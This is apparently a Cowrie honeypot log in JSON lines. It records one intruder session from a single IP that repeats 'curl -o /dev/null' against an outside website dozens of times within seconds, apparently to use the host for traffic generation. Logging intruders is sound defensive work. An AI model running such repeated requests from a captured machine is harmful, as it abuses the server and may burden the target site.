{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.293748Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.333947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.335133Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.373370Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.374392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.413722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.414725Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.452364Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.453412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.490571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.491678Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.539614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.540721Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.577734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.579640Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.618131Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.619259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.670764Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.671831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.708638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.709950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.746461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.747443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.785302Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.786285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.822935Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.824290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.863271Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.864243Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.027361Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.028439Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.092885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.094229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.132070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.133096Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.170348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.171427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.208864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.210167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.248060Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.249054Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.288723Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.289658Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.334346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.335312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.392923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.393864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.432178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.433120Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.471737Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.472714Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.523036Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.524022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.564572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.565566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.605457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.606602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.644555Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.645551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.682557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.683855Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.722466Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.723424Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.761662Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.762557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.802984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.804152Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.840666Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.841745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.880610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.881627Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.948227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.949184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:43.991587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:43.992592Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.032999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.034004Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.088500Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.089531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.127483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.128461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.177203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.178162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.221451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.222326Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.259419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.260490Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.299136Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.300225Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.338805Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.339914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.387161Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.388331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.425415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.426523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.463720Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.464801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.503688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.504694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.541624Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.542831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.580214Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.581155Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.617664Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.618716Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.655877Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.657076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.693633Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.694571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.731121Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.732037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.778755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.780054Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.817288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.818288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.858156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.859229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.896326Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.897351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.933866Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.934811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:44.971331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:44.972314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.009349Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.010455Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.048062Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.049165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.089300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.090550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.127958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
